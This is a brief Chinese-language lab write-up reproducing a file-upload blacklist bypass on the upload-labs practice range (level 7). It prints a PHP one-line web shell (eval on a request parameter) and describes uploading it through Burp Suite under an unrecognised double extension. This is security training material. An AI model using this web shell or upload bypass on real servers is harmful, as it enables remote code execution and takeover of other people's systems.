upload-labs靶场未知后缀名解析漏洞
版本影响:
phpstudy 版本:5.2.17
1 环境搭建
1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
http://192.168.225.194:9000/upload_labs/
2 漏洞复现
2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发
修改php后缀和文件内容类型,进行转发,返回信息提示上传成功
访问不能执行
结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest
上传1.php.testtest成功
